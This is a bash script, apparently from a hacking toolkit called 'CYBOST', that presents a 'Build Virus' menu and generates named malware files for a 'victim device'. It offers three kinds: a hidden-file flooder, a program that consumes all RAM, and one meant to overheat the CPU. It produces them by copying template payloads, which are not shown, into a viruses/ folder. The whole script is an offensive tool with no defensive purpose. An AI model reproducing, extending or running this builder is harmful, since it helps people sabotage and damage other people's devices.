black="\033[0;30m"        # Black
red="\033[0;91m"          # Red
green="\033[0;92m"        # Green
yellow="\033[0;93m"       # Yellow
blue="\033[0;94m"         # Blue
purple="\033[0;95m"       # Purple
cyan="\033[0;36m"         # Cyan
white="\033[0;97m"        # White


# Do not Edit :)
BLACK=$(printf "$black")
WHITE=$(printf "$white")
CYAN=$(printf "$cyan")
BLUE=$(printf "$blue")
RED=$(printf "$red")
GREEN=$(printf "$green")
YELLOW=$(printf "$yellow")
PURPLE=$(printf "$purple")


      printf "$RED ☢ HFI:       $WHITE Build Virus,$RED Function--> Create Unlimited Hidden Files And Directories\n"
      echo "$RED ☢ MEM:       $WHITE Build Virus,$RED Function--> Use 100% ram "
      printf "$RED ☢ CPU:       $WHITE Build Virus,$RED Function--> Increase The Tempreture Of CPU\n"
      printf "\n"
      printf "$WHITE ─[$USER]─[CYBOST]$RED ─╼>$ "
      read vi
      if [ $vi == "HFI" ]
      then
             printf "$RED ☢ Enter the system of the victim device (windows,termux,linux): \n"
             printf "\n"
             printf "$WHITE ─[$USER]─[CYBOST]$RED ─╼>$ "
             read os
             if [ $os == "windows" ]
             then
                   printf "$RED ☢ The virus doesn't finished yet,Sorry!\n"
             elif [ $os == "termux" ]
             then
                   printf "$RED ☢ Enter the Name of the virus:\n"
                   printf "\n"
                   printf "$WHITE ─[$USER]─[CYBOST]$RED ─╼>$ "
                   read namev
                   #printf "$RED ☢ Enter the virus file extension .c or .sh \n"
                   #printf "\n"
                   #printf "$WHITE ─[$USER]─[CYBOST]$RED ─╼>$ "
                   #read ext
                   cd ..
                   cd sae
                   cd UD
                   cp udlnx.sh $namev.sh
                   cd ..
                   cd ..
                   mv sae/UD/$namev.sh viruses/
                   printf "$RED ☢ $namev.sh Saved at viruses/ "
             elif [ $os == "linux" ]
             then
                   printf "$RED ☢ Enter the Name of the virus:\n"
                   printf "\n"
                   printf "$WHITE ─[$USER]─[CYBOST]$RED ─╼>$ "
                   read namevl
                   printf "$RED ☢ Enter the virus file extension .c or .sh or .py\n"
                   printf "\n"
                   printf "$WHITE ─[$USER]─[CYBOST]$RED ─╼>$ "
                   read ext
                   cd ..
                   cd sae
                   cd UD
                   cp udlnx$ext $namevl$ext
                   cd ..
                   cd ..
                   mv sae/UD/$namevl$ext viruses/
                   printf "$RED ☢ $namevl$ext Saved at viruses/ \n"
             else
                   printf "$RED ✘ $os:$WHITE Command Not Found\n"
             fi

      elif [ $vi == "MEM" ]
      then
             printf "$RED ☢ Enter the system of the victim device (windows,termux,linux): \n"
             printf "\n"
             printf "$WHITE ─[$USER]─[CYBOST]$RED ─╼>$ "
             read os2
             if [ $os2 == "windows" ]
             then
                   printf "$RED ☢ The virus doesn't finished yet,Sorry!\n"
             elif [ $os2 == "termux" ]
             then
                   printf "$RED ☢ Enter the Name of the virus:\n"
                   printf "\n"
                   printf "$WHITE ─[$USER]─[CYBOST]$RED ─╼>$ "
                   read namev2
                   #printf "$RED ☢ Enter the virus file extension .c or .sh \n"
                   #printf "\n"
                   #printf "$WHITE ─[$USER]─[CYBOST]$RED ─╼>$ "
                   #read ext
                   cd ..
                   cd sae
                   cd MEM
                   cp memtmx.sh $namev2.sh
                   cd ..
                   cd ..
                   mv sae/MEM/$namev2.sh viruses/
                   printf "$RED ☢ $namev2.sh Saved at viruses/ "
             elif [ $os2 == "linux" ]
             then
                   printf "$RED ☢ Enter the Name of the virus:\n"
                   printf "\n"
                   printf "$WHITE ─[$USER]─[CYBOST]$RED ─╼>$ "
                   read namev3
                   printf "$RED ☢ Enter the virus file extension .c or .sh \n"
                   printf "\n"
                   printf "$WHITE ─[$USER]─[CYBOST]$RED ─╼>$ "
                   read ext2
                   cd ..
                   cd sae
                   cd MEM
                   cp memlnx$ext2 $namev3$ext2
                   cd ..
                   cd ..
                   mv sae/MEM/$namev3$ext2 viruses/
                   printf "$RED ☢ $namev3$ext2 Saved at viruses/ \n"
             else
			printf "$RED ✘ $os2:$WHITE Command Not Found\n"
	     fi
      elif [ $vi == "CPU" ]
      then
             printf "$RED ☢ Enter the system of the victim device (windows,termux,linux): \n"
             printf "\n"
             printf "$WHITE ─[$USER]─[CYBOST]$RED ─╼>$ "
             read os5
             if [ $os5 == "windows" ]
	     then
			printf "$RED ☢ The virus doesn't finished yet,Sorry!\n"
	     elif [ $os5 == "linux" ]
	     then
                   printf "$RED ☢ Enter the Name of the virus:\n"
                   printf "\n"
                   printf "$WHITE ─[$USER]─[CYBOST]$RED ─╼>$ "
                   read namev5
                   printf "$RED ☢ Enter the virus file extension .c or .sh or .py \n"
                   printf "\n"
                   printf "$WHITE ─[$USER]─[CYBOST]$RED ─╼>$ "
                   read ext5
                   cd ..
                   cd sae
                   cd CPU
                   cp cpulnx$ext5 $namev5$ext5
                   cd ..
                   cd ..
                   mv sae/CPU/$namev5$ext5 viruses/
                   printf "$RED ☢ $namev5$ext5 Saved at viruses/ \n"

	     elif [ $os5 == "termux" ]
	     then
                   printf "$RED ☢ Enter the Name of the virus:\n"
                   printf "\n"
                   printf "$WHITE ─[$USER]─[CYBOST]$RED ─╼>$ "
                   read namev6
                   cd ..
                   cd sae
                   cd CPU
                   cp cpulnx.sh $namev6.sh
                   cd ..
                   cd ..
                   mv sae/CPU/$namev6.sh viruses/
                   printf "$RED ☢ $namev6.sh Saved at viruses/ \n"
	     else
		   printf "$RED ✘ $os2:$WHITE Command Not Found\n"
	     fi


      else

		printf "$RED ✘ $vi:$WHITE Command Not Found\n"
      fi
